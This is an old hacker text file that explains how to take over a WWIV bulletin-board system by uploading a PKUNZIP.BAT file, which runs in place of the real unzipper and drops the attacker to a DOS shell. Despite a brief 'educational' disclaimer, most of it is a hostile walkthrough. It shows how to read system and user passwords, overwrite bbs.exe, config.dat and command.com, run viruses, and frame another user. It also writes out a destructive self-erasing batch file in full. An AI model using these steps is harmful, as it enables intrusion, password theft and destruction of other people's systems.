|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= The Crypt Keeper and The Evil Master of WCCP present: Kill the lamer SysOp's computer! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Quick Disk-laimah: This is provided as an educational source and it is not in any way, manner, or form an attempt to destroy WWIV, or any WWIV boards, but serves as a warning to WWIV SysOps that there is a definate back door which has been overlooked. It can be simply rescued by change the filename of PKUNZIP.EXE to somethign else like, "UNPKZIP.EXE" or something like that, and making the other necessary changes in INIT. Are you pissed off at some lamer loser SysOp who runs a WWIV board? You are? Good. Okay, so, here's how you can make the scum really eat dog shit. First off, this will explain how to do it. Then it will explain things to do when you're in DOS. Then it will explain WHY it works. Make a batch file, call it, "PKUNZIP.BAT." In this file put down a single line, "COMMAND". So, it should look like: C:\>copy con pkunzip.bat command ^Z 1 file(s) copied C:\> ^Z is control z. then, call up your hated sysop, make yourself a nice fake account, or, if you wanna, you can do it yourself, but you have to cover up really well, but, it's possible. Put the PKUNZIP.BAT into another ZIp file, or, even zip it itself. then, UL the file. Use the extractor [e] and extract the pkunzip.bat file. Then, chose to extract it ONE more time. the pkunzip.bat file will execute, and if COMMAND.COM is present, then it will drop you off to dos... More on what to do in DOS later. For now, the log will show that you have extracted a file, and then when he wakes uyp, his computer is dead, so, this could represent a problem here. So, here's some fun things: When in dos, type the "CONFIG.DAT" file. a few words will print out, and a whole mess of "line noise." the first few words are passwords. LIke a New User password and the System password. feel free to also type the user list and steal everyone's passwords. maybe you can even DL it sometime later on. If you choose to delete files, don't be a fool and type, "del *.*" or "format c:\" Anything in DOS that requires a "y/n" response will end your session, and it will let the sysop know who you are. that's bad. Very bad. So, type... C:\BBS> copy chain.txt bbs.exe 1 file(s) copied. c:\BBS> copy chain.txt config.dat 1 file(s) copied. C:\BBS> copy chain.txt c:\command.com and similar statements. try to avoid deleting files, unless you remove the directory that they were in. You can really piss people who dunno jack about norton off by "md fuck[alt255]you" this will create a directory: C:\FUCK YOU> and, you can't type "RD FUCK YOU" because of the extra space. If you REALLY hate the guy, before you shell, upload a virus or a trojan horse. when you are in DOS, run the trojan or the virus. that wil way fuck him up. If there is an asshole ont the board who you want to get blamed for it, go in and log on as him. you can attain his numbers and passwords from the users.lst file in the data directory of the BBS. then, after you shell to dos, just type, "format c:\" and it iwll stop you dead in your tracks. But, the SysOp will see it, and probably check who the last caller was... hehe There are lotsa fun things you can do while in DOS, esp. since you don't care what happens. Why does this work? Well, when you extract a file, WWIV does a full_extern which will allow the user online to watch the file being extracted. If extractign the file DOES NOT WORK, then try [v]IEWING a file. well, since pkunzip.bat will be readily available, that will be ran rather than pkunzip.exe Another variation of this could be to UL the file, "pkunzip.bat" - but have it contain somethign like: c: cd\bbs copy config.dat bbs.exe copy config.dat c:\command.com copy chain.txt config.dat copy chain.txt c:\bbs\data\users.lst copy chain.txt c:\newpduls\pkunzip.bat and, then log off. If the SysOp doesn't notice what you've done, the next person to extract or view a file will totally obliterate the board and it wil cover up for itself by destroying the pkunzip.bat batch file. How sweet. Let this be a warning to WWIV SysOps, rather than an excuse to crash all of the WWIV boards in the world.